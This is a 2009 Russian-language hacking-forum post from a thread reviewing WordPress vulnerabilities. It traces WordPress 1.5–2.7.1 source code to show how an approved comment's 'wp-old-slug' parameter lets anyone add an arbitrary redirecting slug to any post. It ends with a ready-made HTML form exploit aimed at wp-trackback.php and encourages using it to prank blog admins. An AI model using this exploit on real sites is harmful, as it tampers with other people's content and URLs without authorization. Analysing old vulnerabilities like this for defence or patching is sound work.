Тема: [ Обзор уязвимостей WordPress ]
Показать сообщение отдельно

Подмена slug в пермалинке любого поста
  #116  
Старый 27.05.2009, 20:18
M4g
Участник форума
Регистрация: 08.05.2007
Сообщений: 164
Провел на форуме:
466673

Репутация: 784
Отправить сообщение для M4g с помощью ICQ
По умолчанию Подмена slug в пермалинке любого поста
7. Подмена slug в пермалинке любого поста (1.5<=WordPress<=2.7.1)

Итак, представь, что на нужном нам блоге присутствует пост с адресом http://lamer/wp233/2009/03/20/hello-world/. Ты хочешь насолить/подшутить над админом и сделать так, чтобы этот пост имел еще и адрес вроде http://lamer/wp233/2009/03/20/this-is-a-sucker-post/. Разработчики вордпресса с радостью предоставляют тебе такую возможность! Но вот что это: баг или фича, я не знаю
Для начала давай детально разберем механизм постинга комментария в последней на момент написания статьи версии 2.7.1.
1. Файлик wp-comments-post.php (а также wp-trackback.php), через который проходят все комментарии имеет в себе следующий код:
Код:
$commentdata = compact('comment_post_ID', 'comment_author', 'comment_author_email', 'comment_author_url', 'comment_content', 'comment_type', 'comment_parent', 'user_ID');
$comment_id = wp_new_comment( $commentdata );
2. Эту функцию мы можем легко отыскать в ./wp-includes/comment.php:
Код:
function wp_new_comment( $commentdata ) 
{
...
	$comment_ID = wp_insert_comment($commentdata);
...
}
3. Там же проводим небольшой реверсинг:
Код:
function wp_insert_comment($commentdata) 
{
...
	if ( $comment_approved == 1)
		wp_update_comment_count($comment_post_ID);

	return $id;
}
function wp_update_comment_count($post_id, $do_deferred=false) 
{
...
	elseif ( $post_id ) {
		return wp_update_comment_count_now($post_id);
	}
}
function wp_update_comment_count_now($post_id) 
{
...
	do_action('edit_post', $post_id, $post);
	return true;
}
4. Action edit_post определен в ./wp-includes/default-filters.php
Код:
add_action('edit_post', 'wp_check_for_changed_slugs');
5. Находим нужную нам функцию в ./wp-includes/post.php
Код:
function wp_check_for_changed_slugs($post_id) {
	if ( !isset($_POST['wp-old-slug']) || !strlen($_POST['wp-old-slug']) )
...
	// if we haven't added this old slug before, add it now
	if ( !count($old_slugs) || !in_array($_POST['wp-old-slug'], $old_slugs) )
		add_post_meta($post_id, '_wp_old_slug', $_POST['wp-old-slug']);
...
}
6. И, собственно, зачем весь этот код нам был нужен, ./wp-includes/query.php:
Код:
function wp_old_slug_redirect () 
{
...
		$query = "SELECT post_id FROM $wpdb->postmeta, $wpdb->posts WHERE ID = post_id AND meta_key = '_wp_old_slug' AND meta_value='" . $wp_query->query_vars['name'] . "'";
...
		wp_redirect($link, '301'); // Permanent redirect
		exit;
	endif;
}
Из анализа вышеприведенного кода следует вывод: если в бд для определенного поста присутствует значение "_wp_old_slug", то по этому самому значению проводится редирект на настоящий адрес поста. Чтобы добавить это значение, твой комментарий должен быть зааппрувлен. Как оставлять комментарии без проверки модератора, ты уже знаешь по первой части статьи Теперь, наконец-то, готовый эксплойт для нашей шутки:
Код:
<html>
<form action="http://lamer.com/wp/wp-trackback.php?p=[ID_ПОСТА]" method="post">
Тайтл: <input name="title" value="commenter"/><br/>
URL:<input name="url" value="http://%/la.com"/><br/>
Comment:<input name="excerpt" value=""/><br/>
Slug:<input name="wp-old-slug" value=""/><br/>
<input name="blog_name" value="Blog" /><br/>
<input type="submit" value="ok"/>
</form>
</html>
В поле "Slug" вставляй новое имя для подходящего поста и показывай ссылку админу, наблюдая за его реакцией
 
Ответить с цитированием